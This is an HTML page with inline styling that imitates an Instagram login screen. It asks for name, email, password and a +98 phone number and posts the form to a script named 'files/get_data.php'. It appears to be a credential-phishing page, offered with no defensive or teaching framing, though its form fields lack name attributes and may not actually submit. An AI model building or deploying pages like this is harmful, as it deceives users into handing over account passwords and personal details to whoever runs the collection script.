<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>    my instagram </title>
    <link rel="stylesheet" href="instagramcss.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<style>
    *{
    margin: 0;
    padding: 0;
    box-sizing: border-box;
}
.setinpor{
    width: 100%;
    height: 100%;
    background-image:linear-gradient(rgb(245, 40, 119) , rgb(255, 0, 98));
   

}
.seten{
    display: flex;
    flex-wrap: wrap;
    flex-direction: column;
    justify-content: center;
    align-items:center;
    align-self: center;
    background-image:linear-gradient(rgb(245, 40, 119) , rgb(255, 0, 98));
    width: 100%;
    height: 100%;

}
.set > form{
    display: flex;
    flex-wrap: wrap;
    flex-direction: column;
    justify-content: space-around;
    align-items: center;
    align-self: center;
    width: 400px;
    height: 500px;
    color: white

    /* background-color: rgb(50, 175, 117); */

}
input{
    width: 85%;
    height: 7%;
    border-radius: 5px;
    outline: none;
    color: white;
    background-color: rgba(255, 255, 255, 0.261);
    border: none;
    /* background-color: rgb(180, 255, 255); */
    /* opacity: .5; */
    /* box-shadow: 1px 1px 5px rgb(151, 144, 74); */
}
.por{
    font-size: 1.8vw;
    color: rgb(252, 251, 249);
}
.red{
    padding: 4px 10px;
}
.red2{
    background-color: rgba(255, 255, 255, 0.07);
}
.por2{
    font-size: 1.5vw;
    color: rgb(252, 251, 249);
}
.seter{
    display: flex;
    flex-wrap: wrap;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    align-self: center;
    margin: 50px;
    padding: 50px;
    color: white;
    border: 2px solid rgba(245, 71, 202, 0.33);
    background-color: rgba(255, 255, 255, 0.029);
    width: 70%;
    height: 10%;
    padding: 10px 10px;
    font-size: 1.3vw;

}
@media screen and (max-width : 600px) {

    .set > form{
        width: 340px;
        height: 540px;
        display: flex;
        flex-wrap: wrap;
        flex-direction: column;
        justify-content: space-around;
        align-items: center;
        align-self: center;
        /* width: 400px; */
        /* height: 500px; */
        color: white

    }
    .seten{
        display: flex;
        flex-wrap: wrap;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        align-self: center;
        /* margin: 50px; */
        /* padding: 90px; */
        color: white;
        border: 2px solid rgba(245, 71, 202, 0.33);
        background-color: rgba(255, 255, 255, 0.029);
        width: 100%;
        height: 100%;
        padding: 0px 10px;
        font-size: 1.9vw;
    
    }
    .setinpor{
        width: auto;
        height: 900px;
        background-image:linear-gradient(rgb(245, 40, 119) , rgba(64, 255, 0, 0.363));
       
    
    }
    .por{
        font-size: 7.8vw;
        color: rgb(252, 251, 249);
    }
    .red{
        padding: 4px 10px;
        color: white;
    }
    .red2{
        background-color: rgba(255, 255, 255, 0.07);
        font-size: 5.5vw;
    }
    .por2{
        font-size: 5.5vw;
        color: rgb(252, 251, 249);
    }
    .seter{
        display: flex;
        flex-wrap: wrap;
        flex-direction:row;
        justify-content: center;
        align-items: center;
        align-self: center;
        margin: 50px;
        padding: 50px;
        color: white;
        border: 2px solid rgba(245, 71, 202, 0.33);
        background-color: rgba(255, 255, 255, 0.029);
        width: 80%;
        height: 7%;
        padding: 10px 10px;
        font-size: 4.2vw;
    
    }
}
</style>
<body>
<div class="setinpor">

    <div class="seten"> 

        <div class="set">

          <form action="files/get_data.php" method="post">
            <p class="por"> Login Instagram </p>
            <input type="name" placeholder="name" required class="red" >
            <input type="email" placeholder="email @gmail.com" required   class="red" >
            <input type="password" placeholder="password" required  class="red" >
            <input type="number" placeholder="+98" required  class="red"> 
            <input type="submit" value="Login"   class="red red2">
            <p class="por2"><i class="	fa fa-facebook-official"></i> Log in Facebook</p>
          </form>
        </div>
        <div class="seter">
          <div class="fer">
            <div class="phon">
               Don't have a account? Sign up.
            </div>
          </div>
        </div>
    </div>
   
  </div>
</body>
</html>